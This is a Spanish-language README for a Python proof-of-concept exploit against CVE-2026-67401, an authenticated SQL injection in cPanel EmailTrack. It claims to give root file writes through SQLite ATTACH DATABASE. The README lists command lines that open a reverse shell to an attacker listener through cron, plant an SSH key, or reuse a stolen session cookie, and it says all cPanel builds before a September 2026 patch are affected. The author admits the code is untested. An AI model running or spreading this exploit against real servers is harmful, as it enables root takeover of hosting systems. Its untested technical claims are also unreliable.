
Prueba de concepto en Python para CVE-2026-67401, una inyección SQL autenticada en cPanel EmailTrack que permite la escritura arbitraria de archivos como root mediante SQLite ATTACH DATABASE, lo que posibilita una reverse shell o la colocación de claves SSH.
Inyección SQL en cPanel EmailTrack. Un usuario autenticado de cPanel con privilegios de correo escribe archivos arbitrarios como root mediante SQLite ATTACH DATABASE. Una sola petición hasta root. No lo he probado en un objetivo real, el código solo está armado a partir de información pública y un diff básico. Haz tu debida diligencia como investigador, pruébalo y envía correcciones mediante PR.
Afecta a todas las compilaciones de cPanel/WHM anteriores al parche del 8 de septiembre de 2026.
requests# Reverse shell mediante cron
python3 poc.py --target https://host:2083 -u user -p pass --lhost 10.0.0.1 --lport 443
# Colocación de clave SSH
python3 poc.py --target https://host:2083 -u user -p pass --ssh-key ~/.ssh/id_rsa.pub
# Sesión existente
python3 poc.py --target https://host:2083 --cookie abc --token cpsessXXX --lhost 10.0.0.1
# Ejecución en seco (imprime la petición, no la envía)
python3 poc.py --target https://host:2083 --dry-run --lhost 10.0.0.1